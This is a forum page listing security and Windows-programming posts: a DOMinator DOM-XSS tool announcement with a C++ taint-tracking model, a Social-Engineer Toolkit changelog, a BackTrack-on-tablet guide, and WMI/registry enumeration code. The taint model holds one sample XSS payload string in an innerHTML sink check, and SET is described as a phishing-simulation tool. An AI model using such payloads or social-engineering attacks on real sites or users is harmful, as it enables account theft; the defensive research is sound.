
Nytro
Administrators
Posts: 18725
Days Won: 706

Everything posted by Nytro

  1. The DOMinator Project

What is DOMinator?

DOMinator is a Firefox-based tool for the analysis and identification of DOM Based Cross Site Scripting issues (DOMXss). It is the first runtime tool that can help security testers identify DOMXss.

How does it work?

It uses a dynamic runtime tainting model on strings and can trace back the taint propagation operations in order to understand whether a DOMXss vulnerability is actually exploitable. You can find an introduction to the implementation flow and a description of the interface here.

What are the possibilities?

In the area of DOMXss the possibilities are practically endless. At the moment DOMinator can help in identifying reflected DOM Based XSS, but there is potential to extend it to stored DOMXss analysis.

Download

Start from the installation instructions, then have a look at the video. Use the issues page to post about problems, crashes or whatever. And finally subscribe to the DOMinator Mailing List to get live news.

Video

A video has been uploaded here to show how it works. Soon I'll post more tutorials about the community version.

Some stats about DOM XSS

We downloaded the top Alexa 1 million sites and analyzed the first 100 in order to verify the presence of exploitable DOM Based Cross Site Scripting vulnerabilities. Using DOMinator we found that 56 out of 100 (56% of sites) were vulnerable to reliable DOMXss attacks. Some analysis examples can be found here and here. We'll release a white paper about this research; in the meantime you can try to reproduce our results using DOMinator.

Future work

DOMinator is still in beta stage, but I see a lot of potential in this project. For example, I can think of:
- a DOMinator library (SpiderMonkey) used in web security scanner projects for automated batch testing;
- logging saved to a DB and analyzed later;
- per-page testing using Selenium/iMacros;
- a version of DOMinator for XULRunner;
- a lot more.
It only depends on how many people will help me improve it.

So, if you're interested in contributing to the code (or in funding the project) let me know and I'll add you to the project contributors. We have some commercial ideas about developing a more usable interface with our knowledge base, but we can assure you that the community version will always be open and free. In the next few days I'll release a whitepaper about DOMinator describing the implementation choices and the technical details. Stay tuned for more information about DOMinator... the best is yet to come.

Acknowledgements

DOMinator is a project sponsored by Minded Security, created and maintained by me (Stefano Di Paola). I also want to thank Arshan Dabirsiaghi (Aspect Security), Gareth Heyes and Luca Carettoni (Matasano) for their feedback on the pre-pre-beta version. Finally, feel free to follow DOMinator news on Twitter as well by subscribing to @WisecWisec and @DOMXss.

Source: Minded Security Blog: The DOMinator Project
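The tainting model described in the post above, as an added example written for this page (it is not DOMinator's code; the real tool instruments the string operations of SpiderMonkey inside Firefox). Strings carry a taint flag plus a trace of the operations applied to them, a sanitiser such as encodeURIComponent is modelled as clearing the taint while staying in the trace, and a sink check reports whether attacker-controlled data reached the sink and by which path. The function names, the rule that an encoder clears taint, the two modelled page scripts and the sample payload are all assumptions of the example.

```cpp
#include <cctype>
#include <cstdio>
#include <string>
#include <vector>

// A string value together with its taint state and the history of operations applied to it.
struct TaintedString {
    std::string value;
    bool tainted;                     // true while attacker-controlled bytes are still in it
    std::vector<std::string> trace;   // e.g. "source:location.hash", "substring(1)", "concat"
};

// Values read from a DOM source (location.hash, document.referrer, window.name, ...) are tainted.
TaintedString fromSource(const std::string& sourceName, const std::string& value) {
    return TaintedString{value, true, {"source:" + sourceName}};
}

// String literals that belong to the page's own script are never tainted.
TaintedString literal(const std::string& value) {
    return TaintedString{value, false, {}};
}

// Taint propagates through concatenation; the operand traces are merged.
TaintedString concat(const TaintedString& a, const TaintedString& b) {
    TaintedString r{a.value + b.value, a.tainted || b.tainted, a.trace};
    r.trace.insert(r.trace.end(), b.trace.begin(), b.trace.end());
    r.trace.push_back("concat");
    return r;
}

// substring() keeps the taint of its input: a slice of attacker data is still attacker data.
TaintedString substring(const TaintedString& s, size_t pos) {
    TaintedString r{s.value.substr(pos), s.tainted, s.trace};
    r.trace.push_back("substring(" + std::to_string(pos) + ")");
    return r;
}

// Percent-encoding the way encodeURIComponent does it leaves no markup characters, so the
// result is modelled as sanitised (assumption of this example): taint is cleared, the
// operation stays in the trace so the tester can see where the data was neutralised.
TaintedString encodeURIComponent(const TaintedString& s) {
    static const std::string keep = "-_.!~*'()";
    std::string out;
    for (unsigned char c : s.value) {
        if (std::isalnum(c) || keep.find((char)c) != std::string::npos) {
            out += (char)c;
        } else {
            char buf[4];
            std::snprintf(buf, sizeof buf, "%%%02X", c);
            out += buf;
        }
    }
    TaintedString r{out, false, s.trace};
    r.trace.push_back("encodeURIComponent");
    return r;
}

// Result of a sink check: if the value is still tainted, the trace tells the tester which
// operations the attacker-controlled data went through on its way to the sink.
struct SinkReport {
    std::string sink;
    std::string value;
    bool exploitable;
    std::vector<std::string> trace;
};

SinkReport checkSink(const std::string& sinkName, const TaintedString& s) {
    return SinkReport{sinkName, s.value, s.tainted, s.trace};
}

// Models the page script:  el.innerHTML = "<b>" + location.hash.substring(1) + "</b>";
SinkReport vulnerableFlow(const std::string& locationHash) {
    TaintedString hash = fromSource("location.hash", locationHash);
    TaintedString html = concat(concat(literal("<b>"), substring(hash, 1)), literal("</b>"));
    return checkSink("innerHTML", html);
}

// Models the fixed script:  el.innerHTML = "<b>" + encodeURIComponent(location.hash.substring(1)) + "</b>";
SinkReport safeFlow(const std::string& locationHash) {
    TaintedString hash = fromSource("location.hash", locationHash);
    TaintedString html = concat(concat(literal("<b>"), encodeURIComponent(substring(hash, 1))),
                                literal("</b>"));
    return checkSink("innerHTML", html);
}

int main() {
    const std::string payload = "#<img src=x onerror=alert(1)>";   // constructed sample input
    for (const SinkReport& r : {vulnerableFlow(payload), safeFlow(payload)}) {
        std::printf("%s <- %s: %s\n  trace:", r.sink.c_str(), r.value.c_str(),
                    r.exploitable ? "EXPLOITABLE" : "not exploitable");
        for (const std::string& step : r.trace) std::printf(" %s", step.c_str());
        std::printf("\n");
    }
    return 0;
}
```

The first flow reports the innerHTML sink as exploitable with the trace source:location.hash, substring(1), concat, concat; the second shows the same path with encodeURIComponent in between and no taint left at the sink, which is the distinction the post describes between a tainted sink and an actually exploitable one.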
  2. The Social-Engineer Toolkit v1.4

"The Social Engineering Toolkit (SET) is a python-driven suite of custom tools which solely focuses on attacking the human element of penetration testing. Its main purpose is to augment and simulate social-engineering attacks and allow the tester to effectively test how a targeted attack may succeed."

This is the official change log:
- Java changed how self-signed certificates work. It shows a big UNKNOWN now; modified self-signing a bit.
- Added the ability to purchase a code signing certificate and sign it automatically. You can either import or create a request.
- Fixed a bug in the wifi attack vector where it would not recognize /usr/local/sbin/dnsspoof as a valid path.
- Fixed a bug in the new BackTrack 5 to recognize airmon-ng.
- Added the ability to import your own code signing certificate without having to generate it through SET.
- Fixed an issue where the web templates would load two Java applets by mistake; it now correctly loads only one.
- Fixed a bounds exception issue when using the SET interactive shell; it was using pexpect.spawn and was changed to subprocess.Popen instead.
- Added better import detection and error handling around the python module readline. Older versions of python may not have it; if it detects that python-readline is not installed it will disable tab completion.
- Added a new menu to the main SET interface: the verified code signing certificate menu.
- Fixed a bug with the SET interactive shell where, if you selected a number that was out of the range of shells listed, it would hang. It now throws a proper exception if an invalid number or non-numeric input is given.
- Added more documentation around the core modules in the SET User Manual.
- Updated the SET User Manual to reflect version 1.4.

Download: http://www.secmaniac.com/download/

Source: UPDATE: The Social-Engineer Toolkit v1.4!
  3. Has anyone else noticed that these "disclosures" are made on days ending in 7? That is, the 7th, 17th, 27th...? I'm referring to the latest actions.
  4. I NO LONGER HAVE nytro_rst @ yahoo.com. I sent the password out as a mass message, and I also posted it here on the forum. I had no use for that ID. And of course, 2 minutes later the password was changed and some loser was sending mass messages with some keylogger or stealer. As for the e-mail on my profile, nytro@rstcenter.com, it is there just for form's sake; I don't have that mailbox. So in no case did I send those e-mails, I don't do that kind of thing, I hate that sort of crap. If it sends an attached file, post it here so I can analyse it.
  5. Back|Track 5 on Motorola XOOM in 10 minutes or less

Here's a quick and dirty guide on how to get Back|Track 5 working on the Motorola XOOM. There are a few tutorials out there already, but none of them seemed the easiest (at least for me).

1. You will need to root your Motorola XOOM: download the android-sdk and use adb to root your XOOM. The steps can be found here.
2. Download Back|Track 5 ARM edition from here: Downloads
3. Unzip the BT5 zip file and copy it over to your XOOM's SDCARD directory; make it easy and name the folder BT5. If you're using a Mac, download Android File Transfer here.
4. Download ASTRO File Manager from the Android Market on your XOOM.
5. Browse to your BT5 directory on the SDCARD and click on boot.img.gz. Extract the content in the same directory. Note that we couldn't just ungzip it and copy it over, since the card is FAT32 and when extracted the image is a total of 5 GB. It will take a few minutes to extract; the final file size will be exactly 5.0 GB. Just be patient, and go up a directory and back in to see when it has completed: the extracting message may go away, but it will still be extracting.
6. Once you have that, go into your terminal emulator (for example busybox terminal) and type:
       cd /sdcard/BT5
       cp busybox ../
       sh installbusybox.sh
   Once that is completed, type:
       sh bootbt
7. You should now be at a BT command prompt. Type the following in the terminal: export USER=root
8. You can run vncpasswd to change the VNC password or leave it at the default (toortoor).
9. Type startvnc
10. Download a VNC viewer from the Android Market on your XOOM.
11. Connect to localhost on port 5901 with the new password you just created.

There you go. You're all set.

Source: Back|Track 5 on Motorola XOOM in 10 minutes or less | SecManiac.com
  6. Finding If a Computer Is a Laptop

Marius Bancila, C++, COM, 2011-01-05

I recently ran across this question: how to find out (using C++) whether a computer is a laptop? That is possible with WMI, and many answers (such as this one) point to the Win32_SystemEnclosure class. This class has a member called ChassisTypes, which is an array of integers indicating the possible chassis types. At least one of them should indicate a laptop. However, there are several problems with this solution. First, there are several values for "laptops":
- 8 - Portable
- 9 - Laptop
- 10 - Notebook
Different machines might return different values. More importantly, this property might not be defined on all computers.

A more reliable solution is explained in the TechNet article Finding Computers That Are Laptops. The solution described there suggests checking several properties:
- Win32_SystemEnclosure, ChassisTypes(1)=10
- Win32_Battery or Win32_PortableBattery
- Win32_PCMCIAController
- Win32_DriverVXD.Name = "pccard"
- Win32_ComputerSystem.Manufacturer
- Win32_ComputerSystem.Model

The following code shows how one can query for the chassis types using C++. Run queries for the other properties to make sure you are running on a laptop.

    #define _WIN32_DCOM
    #include <iostream>
    #include <tchar.h>
    using namespace std;

    #include <comdef.h>
    #include <Wbemidl.h>
    #pragma comment(lib, "wbemuuid.lib")

    // Small wrapper around the WMI connection: locator, services proxy and a WQL query helper.
    class WMIQuery
    {
        IWbemLocator*  m_pLocator;
        IWbemServices* m_pServices;
    public:
        WMIQuery(): m_pLocator(NULL), m_pServices(NULL) { }

        bool Initialize()
        {
            // Obtain the initial locator to WMI
            HRESULT hr = ::CoCreateInstance(
                CLSID_WbemLocator, 0, CLSCTX_INPROC_SERVER,
                IID_IWbemLocator, (LPVOID*)&m_pLocator);
            if (FAILED(hr))
            {
                cerr << "Failed to create IWbemLocator object. Err code = 0x" << hex << hr << endl;
                return false;
            }

            // Connect to WMI through the IWbemLocator::ConnectServer method
            // Connect to the root\cimv2 namespace with the current user
            hr = m_pLocator->ConnectServer(
                _bstr_t(L"ROOT\\CIMV2"), // Object path of WMI namespace
                NULL,                    // User name. NULL = current user
                NULL,                    // User password. NULL = current
                0,                       // Locale. NULL indicates current
                NULL,                    // Security flags.
                0,                       // Authority (e.g. Kerberos)
                0,                       // Context object
                &m_pServices             // pointer to IWbemServices proxy
            );
            if (FAILED(hr))
            {
                cerr << "Could not connect. Error code = 0x" << hex << hr << endl;
                m_pLocator->Release();
                m_pLocator = NULL;
                return false;
            }

            // Set security levels on the proxy
            hr = ::CoSetProxyBlanket(
                m_pServices,                 // Indicates the proxy to set
                RPC_C_AUTHN_WINNT,           // RPC_C_AUTHN_xxx
                RPC_C_AUTHZ_NONE,            // RPC_C_AUTHZ_xxx
                NULL,                        // Server principal name
                RPC_C_AUTHN_LEVEL_CALL,      // RPC_C_AUTHN_LEVEL_xxx
                RPC_C_IMP_LEVEL_IMPERSONATE, // RPC_C_IMP_LEVEL_xxx
                NULL,                        // client identity
                EOAC_NONE                    // proxy capabilities
            );
            if (FAILED(hr))
            {
                cerr << "Could not set proxy blanket. Error code = 0x" << hex << hr << endl;
                m_pServices->Release();
                m_pServices = NULL;
                m_pLocator->Release();
                m_pLocator = NULL;
                return false;
            }
            return true;
        }

        // Run a WQL query; the caller owns (and must Release) the returned enumerator.
        IEnumWbemClassObject* Query(LPCTSTR strquery)
        {
            IEnumWbemClassObject* pEnumerator = NULL;
            HRESULT hr = m_pServices->ExecQuery(
                bstr_t("WQL"),
                bstr_t(strquery),
                WBEM_FLAG_FORWARD_ONLY | WBEM_FLAG_RETURN_IMMEDIATELY,
                NULL,
                &pEnumerator);
            if (FAILED(hr))
            {
                cerr << "Query failed. Error code = 0x" << hex << hr << endl;
                return NULL;
            }
            return pEnumerator;
        }

        ~WMIQuery()
        {
            if (m_pServices != NULL)
            {
                m_pServices->Release();
                m_pServices = NULL;
            }
            if (m_pLocator != NULL)
            {
                m_pLocator->Release();
                m_pLocator = NULL;
            }
        }
    };

    int _tmain(int argc, _TCHAR* argv[])
    {
        HRESULT hres;

        // Initialize COM.
        hres = ::CoInitializeEx(0, COINIT_MULTITHREADED);
        if (FAILED(hres))
        {
            cout << "Failed to initialize COM library. Error code = 0x" << hex << hres << endl;
            return 1;
        }

        // Set general COM security levels
        hres = ::CoInitializeSecurity(
            NULL,
            -1,                          // COM authentication
            NULL,                        // Authentication services
            NULL,                        // Reserved
            RPC_C_AUTHN_LEVEL_DEFAULT,   // Default authentication
            RPC_C_IMP_LEVEL_IMPERSONATE, // Default Impersonation
            NULL,                        // Authentication info
            EOAC_NONE,                   // Additional capabilities
            NULL                         // Reserved
        );
        if (FAILED(hres))
        {
            cout << "Failed to initialize security. Error code = 0x" << hex << hres << endl;
            ::CoUninitialize();
            return 1;
        }

        {
            WMIQuery query;
            if (query.Initialize())
            {
                IEnumWbemClassObject* pEnumerator =
                    query.Query(_T("SELECT * FROM Win32_SystemEnclosure"));
                if (pEnumerator != NULL)
                {
                    // Get the data from the query
                    IWbemClassObject* pclsObj = NULL;
                    ULONG uReturn = 0;
                    while (pEnumerator)
                    {
                        HRESULT hr = pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn);
                        if (0 == uReturn)
                            break;

                        VARIANT vtProp;
                        VariantInit(&vtProp);
                        hr = pclsObj->Get(L"Name", 0, &vtProp, 0, 0);
                        if (SUCCEEDED(hr) && vtProp.vt == VT_BSTR)
                            wcout << L"Name: " << vtProp.bstrVal << endl;
                        VariantClear(&vtProp);

                        // ChassisTypes is a uint16 array in CIM; WMI hands it over as a
                        // SAFEARRAY of I4 values, possibly by reference.
                        hr = pclsObj->Get(L"ChassisTypes", 0, &vtProp, 0, 0);
                        wcout << L"Chassis: ";
                        SAFEARRAY* parrValues = NULL;
                        if (SUCCEEDED(hr) && (vtProp.vt & VT_ARRAY))
                        {
                            if (vtProp.vt & VT_BYREF)
                                parrValues = *vtProp.pparray;
                            else
                                parrValues = vtProp.parray;
                        }
                        if (parrValues != NULL)
                        {
                            LONG lLower = 0, lUpper = -1;
                            SafeArrayGetLBound(parrValues, 1, &lLower);
                            SafeArrayGetUBound(parrValues, 1, &lUpper);
                            for (LONG lIndex = lLower; lIndex <= lUpper; lIndex++)
                            {
                                INT item = 0;
                                HRESULT hrElem = ::SafeArrayGetElement(parrValues, &lIndex, &item);
                                if (FAILED(hrElem))
                                    continue;
                                LPCTSTR szType = _T("(unlisted value)");
                                switch (item)
                                {
                                case 1:  szType = _T("Other"); break;
                                case 2:  szType = _T("Unknown"); break;
                                case 3:  szType = _T("Desktop"); break;
                                case 4:  szType = _T("Low Profile Desktop"); break;
                                case 5:  szType = _T("Pizza Box"); break;
                                case 6:  szType = _T("Mini Tower"); break;
                                case 7:  szType = _T("Tower"); break;
                                case 8:  szType = _T("Portable"); break;
                                case 9:  szType = _T("Laptop"); break;
                                case 10: szType = _T("Notebook"); break;
                                case 11: szType = _T("Hand Held"); break;
                                case 12: szType = _T("Docking Station"); break;
                                case 13: szType = _T("All in One"); break;
                                case 14: szType = _T("Sub Notebook"); break;
                                case 15: szType = _T("Space-Saving"); break;
                                case 16: szType = _T("Lunch Box"); break;
                                case 17: szType = _T("Main System Chassis"); break;
                                case 18: szType = _T("Expansion Chassis"); break;
                                case 19: szType = _T("SubChassis"); break;
                                case 20: szType = _T("Bus Expansion Chassis"); break;
                                case 21: szType = _T("Peripheral Chassis"); break;
                                case 22: szType = _T("Storage Chassis"); break;
                                case 23: szType = _T("Rack Mount Chassis"); break;
                                case 24: szType = _T("Sealed-Case PC"); break;
                                }
                                wcout << szType;
                                if (lIndex < lUpper)
                                    wcout << L", ";
                            }
                            wcout << endl;
                        }
                        VariantClear(&vtProp);
                        pclsObj->Release();
                    }
                    pEnumerator->Release();
                }
            }
        } // the WMIQuery destructor releases the WMI interfaces before COM is torn down

        ::CoUninitialize();
        return 0;
    }

On my laptop, the program output was:

    Name: System Enclosure
    Chassis: Notebook

Source: Finding If a Computer Is a Laptop | Marius Bancila's Blog
  7. Finding Installed Applications with VC++

Marius Bancila, C++, COM, Windows Programming, 2011-05-01

Finding the applications installed on a machine (the ones you see in Control Panel, Add/Remove Programs) can be a little tricky, because there isn't a bulletproof API or method. Each of the available methods has its own weak points. WMI is slow and can actually be disabled on a machine. The MSI API only shows applications installed with an MSI, and reading directly from the Windows Registry is not an officially supported alternative. Thus it is an open question which one is the most appropriate, though the official answer will probably be the MSI API. In this post I will go through all three of these methods and show how to query for the installed applications and display the name, publisher, version and installation location (if available). Notice these are just samples; if you want to use this in your applications you'll probably want to do additional things like better error checking.

Because I want the code to work with both ANSI and UNICODE I will use the following defines:

    #include <iostream>
    #include <string>

    #ifdef _UNICODE
    #define tcout   wcout
    #define tstring wstring
    #else
    #define tcout   cout
    #define tstring string
    #endif

WMI

Win32_Product is a WMI class that represents a product installed by Windows Installer. For fetching the list of installed applications with WMI I will reuse the WMIQuery class first shown in the previous post (Finding If a Computer Is a Laptop); it is not repeated here. You need to include Wbemidl.h and link with wbemuuid.lib. In the code shown below, WmiQueryValue() is a function that reads a property from the current record and returns it as an STL string (UNICODE or ANSI). WmiEnum() is a function that fetches and displays in the console all the installed applications.

    // Read a string property of the current WMI object; empty if missing or not a string.
    tstring WmiQueryValue(IWbemClassObject* pclsObj, LPCWSTR szName)
    {
        tstring value;
        if (pclsObj != NULL && szName != NULL)
        {
            VARIANT vtProp;
            VariantInit(&vtProp);
            HRESULT hr = pclsObj->Get(szName, 0, &vtProp, 0, 0);
            if (SUCCEEDED(hr))
            {
                if (vtProp.vt == VT_BSTR && ::SysStringLen(vtProp.bstrVal) > 0)
                {
    #ifdef _UNICODE
                    value = vtProp.bstrVal;
    #else
                    // ask for the converted length first (it includes the terminator)
                    int len = ::WideCharToMultiByte(CP_ACP, 0, vtProp.bstrVal, -1, NULL, 0, NULL, NULL);
                    if (len > 1)
                    {
                        value.resize(len);
                        ::WideCharToMultiByte(CP_ACP, 0, vtProp.bstrVal, -1, &value[0], len, NULL, NULL);
                        value.resize(len - 1);   // drop the terminator copied into the string
                    }
    #endif
                }
                VariantClear(&vtProp);   // frees the BSTR returned by Get
            }
        }
        return value;
    }

    void WmiEnum()
    {
        HRESULT hres;

        // Initialize COM.
        hres = ::CoInitializeEx(0, COINIT_MULTITHREADED);
        if (FAILED(hres))
        {
            cout << "Failed to initialize COM library. Error code = 0x" << hex << hres << endl;
            return;
        }

        // Set general COM security levels
        hres = ::CoInitializeSecurity(
            NULL,
            -1,                          // COM authentication
            NULL,                        // Authentication services
            NULL,                        // Reserved
            RPC_C_AUTHN_LEVEL_DEFAULT,   // Default authentication
            RPC_C_IMP_LEVEL_IMPERSONATE, // Default Impersonation
            NULL,                        // Authentication info
            EOAC_NONE,                   // Additional capabilities
            NULL                         // Reserved
        );
        if (FAILED(hres))
        {
            cout << "Failed to initialize security. Error code = 0x" << hex << hres << endl;
            ::CoUninitialize();
            return;
        }

        {
            WMIQuery query;
            if (query.Initialize())
            {
                IEnumWbemClassObject* pEnumerator = query.Query(_T("SELECT * FROM Win32_Product"));
                if (pEnumerator != NULL)
                {
                    // Get the data from the query
                    IWbemClassObject* pclsObj = NULL;
                    ULONG uReturn = 0;
                    while (pEnumerator)
                    {
                        HRESULT hr = pEnumerator->Next(WBEM_INFINITE, 1, &pclsObj, &uReturn);
                        if (0 == uReturn)
                            break;

                        // find the values of the properties we are interested in
                        tstring name      = WmiQueryValue(pclsObj, L"Name");
                        tstring publisher = WmiQueryValue(pclsObj, L"Vendor");
                        tstring version   = WmiQueryValue(pclsObj, L"Version");
                        tstring location  = WmiQueryValue(pclsObj, L"InstallLocation");
                        if (!name.empty())
                        {
                            tcout << name << endl;
                            tcout << " - " << publisher << endl;
                            tcout << " - " << version << endl;
                            tcout << " - " << location << endl;
                            tcout << endl;
                        }
                        pclsObj->Release();
                    }
                    pEnumerator->Release();
                }
            }
        } // release the WMI interfaces before COM is uninitialized

        ::CoUninitialize();
    }

A sample from the output of this WmiEnum() function looks like this:

    Java™ 6 Update 25 - Oracle - 6.0.250 - C:\Program Files\Java\jre6\
    Java™ SE Development Kit 6 Update 25 - Oracle - 1.6.0.250 - C:\Program Files\Java\jdk1.6.0_25\
    Microsoft .NET Framework 4 Client Profile - Microsoft Corporation - 4.0.30319 -
    Microsoft Sync Framework Services v1.0 SP1 (x86) - Microsoft Corporation - 1.0.3010.0 -
    Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools - Microsoft Corporation - 2.0.50217.0 -
    Adobe Reader X (10.0.1) - Adobe Systems Incorporated - 10.0.1 - C:\Program Files\Adobe\Reader 10.0\Reader\

One can notice that the code is relatively long, but most importantly it is very slow.
MSI API

Two of the MSI API functions can help fetch the list of installed applications:
- MsiEnumProductsEx: enumerates one or all the instances of products that are currently advertised or installed (requires Windows Installer 3.0 or newer)
- MsiGetProductInfoEx: returns product information for advertised and installed products

In order to use these functions you need to include msi.h and link to msi.lib. In the code below, MsiQueryProperty() is a function that returns the value of a product property (as a tstring as defined above) by calling MsiGetProductInfoEx. MsiEnum() is a function that iterates through all the installed applications and prints to the console the name, publisher, version and installation location.

    // Fetch one product property; the first call with a NULL buffer only reports the length.
    tstring MsiQueryProperty(LPCTSTR szProductCode, LPCTSTR szUserSid,
                             MSIINSTALLCONTEXT dwContext, LPCTSTR szProperty)
    {
        tstring value;
        DWORD cchValue = 0;
        UINT ret = ::MsiGetProductInfoEx(
            szProductCode, szUserSid, dwContext, szProperty, NULL, &cchValue);
        if (ret == ERROR_SUCCESS && cchValue > 0)
        {
            cchValue++;                  // room for the terminator
            value.resize(cchValue);
            ret = ::MsiGetProductInfoEx(
                szProductCode, szUserSid, dwContext, szProperty, &value[0], &cchValue);
            if (ret == ERROR_SUCCESS)
                value.resize(cchValue);  // on output the count excludes the terminator
            else
                value.clear();
        }
        return value;
    }

    void MsiEnum()
    {
        UINT ret = 0;
        DWORD dwIndex = 0;
        TCHAR szInstalledProductCode[39] = {0};   // a GUID string plus terminator
        TCHAR szSid[128] = {0};
        DWORD cchSid;
        MSIINSTALLCONTEXT dwInstalledContext;

        do
        {
            memset(szInstalledProductCode, 0, sizeof(szInstalledProductCode));
            cchSid = sizeof(szSid) / sizeof(szSid[0]);
            ret = ::MsiEnumProductsEx(
                NULL,                // all the products in the context
                _T("s-1-1-0"),       // i.e. Everyone, all users in the system
                MSIINSTALLCONTEXT_USERMANAGED | MSIINSTALLCONTEXT_USERUNMANAGED | MSIINSTALLCONTEXT_MACHINE,
                dwIndex,
                szInstalledProductCode,
                &dwInstalledContext,
                szSid,
                &cchSid);
            if (ret == ERROR_SUCCESS)
            {
                // per-machine products come back without a SID
                LPCTSTR szUserSid = (cchSid == 0) ? NULL : szSid;
                tstring name      = MsiQueryProperty(szInstalledProductCode, szUserSid,
                                                     dwInstalledContext, INSTALLPROPERTY_INSTALLEDPRODUCTNAME);
                tstring publisher = MsiQueryProperty(szInstalledProductCode, szUserSid,
                                                     dwInstalledContext, INSTALLPROPERTY_PUBLISHER);
                tstring version   = MsiQueryProperty(szInstalledProductCode, szUserSid,
                                                     dwInstalledContext, INSTALLPROPERTY_VERSIONSTRING);
                tstring location  = MsiQueryProperty(szInstalledProductCode, szUserSid,
                                                     dwInstalledContext, INSTALLPROPERTY_INSTALLLOCATION);
                tcout << name << endl;
                tcout << " - " << publisher << endl;
                tcout << " - " << version << endl;
                tcout << " - " << location << endl;
                tcout << endl;
                dwIndex++;
            }
        } while (ret == ERROR_SUCCESS);
    }

And this is a sample of the output of the MsiEnum() function:

    Java™ 6 Update 25 - Oracle - 6.0.250 - C:\Program Files\Java\jre6\
    Java™ SE Development Kit 6 Update 25 - Oracle - 1.6.0.250 - C:\Program Files\Java\jdk1.6.0_25\
    Microsoft .NET Framework 4 Client Profile - Microsoft Corporation - 4.0.30319 -
    Microsoft Sync Framework Services v1.0 SP1 (x86) - Microsoft Corporation - 1.0.3010.0 -
    Microsoft ASP.NET MVC 2 - Visual Studio 2010 Tools - Microsoft Corporation - 2.0.50217.0 -
    Adobe Reader X (10.0.1) - Adobe Systems Incorporated - 10.0.1 - C:\Program Files\Adobe\Reader 10.0\Reader\

Windows Registry

Installed applications are listed in the Windows Registry under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall. On 64-bit Windows, 32-bit applications are listed under the Wow6432Node counterpart of that key, and per-user installations under the same path in HKEY_CURRENT_USER, so a complete inventory has to walk all three. The KB247501 article explains the structure of the information under this Registry key. Make sure you read it if you decide to use this approach. In the code shown below, RegistryQueryValue() is a function that queries the value of a name/value pair in the registry and returns the value as a tstring. RegistryEnum() is a function that prints to the console all the installed applications as found in the registry.

    // Read a REG_SZ / REG_EXPAND_SZ value as a tstring; empty if missing or of another type.
    tstring RegistryQueryValue(HKEY hKey, LPCTSTR szName)
    {
        tstring value;
        DWORD dwType = 0;
        DWORD dwSize = 0;   // in bytes, not characters
        if (::RegQueryValueEx(
                hKey,     // key handle
                szName,   // item name
                NULL,     // reserved
                &dwType,  // type of data stored
                NULL,     // no data buffer
                &dwSize   // required buffer size
            ) == ERROR_SUCCESS && dwSize > 0 && (dwType == REG_SZ || dwType == REG_EXPAND_SZ))
        {
            value.resize(dwSize / sizeof(TCHAR));
            if (::RegQueryValueEx(
                    hKey,                 // key handle
                    szName,               // item name
                    NULL,                 // reserved
                    &dwType,              // type of data stored
                    (LPBYTE)&value[0],    // data buffer
                    &dwSize               // available buffer size
                ) == ERROR_SUCCESS)
            {
                // the stored string normally includes its terminator; cut it off
                tstring::size_type end = value.find(_T('\0'));
                if (end != tstring::npos)
                    value.resize(end);
            }
            else
            {
                value.clear();
            }
        }
        return value;
    }

    void RegistryEnum()
    {
        HKEY hKey;
        LONG ret = ::RegOpenKeyEx(
            HKEY_LOCAL_MACHINE,                                          // local machine hive
            _T("Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall"), // uninstall key
            0,                                                           // reserved
            KEY_READ,                                                    // desired access
            &hKey                                                        // handle to the open key
        );
        if (ret != ERROR_SUCCESS)
            return;

        DWORD dwIndex = 0;
        DWORD cbName = 1024;
        TCHAR szSubKeyName[1024];
        while ((ret = ::RegEnumKeyEx(hKey, dwIndex, szSubKeyName, &cbName,
                                     NULL, NULL, NULL, NULL)) != ERROR_NO_MORE_ITEMS)
        {
            if (ret == ERROR_SUCCESS)
            {
                HKEY hItem;
                if (::RegOpenKeyEx(hKey, szSubKeyName, 0, KEY_READ, &hItem) == ERROR_SUCCESS)
                {
                    tstring name      = RegistryQueryValue(hItem, _T("DisplayName"));
                    tstring publisher = RegistryQueryValue(hItem, _T("Publisher"));
                    tstring version   = RegistryQueryValue(hItem, _T("DisplayVersion"));
                    tstring location  = RegistryQueryValue(hItem, _T("InstallLocation"));
                    if (!name.empty())
                    {
                        tcout << name << endl;
                        tcout << " - " << publisher << endl;
                        tcout << " - " << version << endl;
                        tcout << " - " << location << endl;
                        tcout << endl;
                    }
                    ::RegCloseKey(hItem);
                }
            }
            dwIndex++;
            cbName = 1024;   // RegEnumKeyEx overwrites it with the length of the last name
        }
        ::RegCloseKey(hKey);
    }

And a sample of the output of the RegistryEnum() function:

    Java™ SE Development Kit 6 Update 25 - Oracle - 1.6.0.250 - C:\Program Files\Java\jdk1.6.0_25\
    Microsoft Visual Studio 2005 Tools for Office Runtime - Microsoft Corporation - 8.0.60940.0 -
    MSDN Library for Visual Studio 2008 - ENU - Microsoft - 9.0.21022 - C:\Program Files\MSDN\MSDN9.0\
    Microsoft SQL Server Compact 3.5 SP2 ENU - Microsoft Corporation - 3.5.8080.0 - C:\Program Files\Microsoft SQL Server Compact Edition\
    Microsoft .NET Framework 4 Client Profile - Microsoft Corporation - 4.0.30319 -

Source: Finding Installed Applications with VC++ | Marius Bancila's Blog
  8. Probably only on those with the ARM processor architecture. And probably not even on all of those.
  9. Hooking 32bit System Calls under WOW64

oxff: Georg Wicherski, 2011-05-16 16:47:49

While hooking code in userland seems to be fairly common for various purposes (such as sandboxing malware by API hooking), hooking system calls is usually not done in userland. As you can get the same information by employing such hooks in kernelland (just after the transition), people usually choose to deploy their hooks there, since they benefit from added security and stability if implemented properly.

That being said, there is one application of system call hooking that rightfully belongs in userland: hooking of 32bit system calls on a native 64bit environment. WOW64 is the emulation / abstraction layer introduced in 64bit Windows to support 32bit applications. There are many details about it that I don't want to cover. However, for various reasons (I'll leave it to your creativity to find your own; I found a good one playing together with Tillmann Werner), one might be interested in hooking the 32bit system calls that are issued by a 32bit application running in such an environment.

On 32bit Windows XP, there used to be a function pointer within the KUSER_SHARED_DATA page at offset 0x300 that pointed to the symbol ntdll!KiFastSystemCall on any modern machine and was used by every system call wrapper in ntdll to issue a system call:

    0:001> u poi(0x7ffe0000+0x300)
    ntdll!KiFastSystemCall:
    7c90e510 8bd4            mov     edx,esp
    7c90e512 0f34            sysenter
    ntdll!KiFastSystemCallRet:
    7c90e514 c3              ret
    7c90e515 8da42400000000  lea     esp,[esp]
    7c90e51c 8d642400        lea     esp,[esp]
    ntdll!KiIntSystemCall:
    7c90e520 8d542408        lea     edx,[esp+8]
    7c90e524 cd2e            int     2Eh
    7c90e526 c3              ret

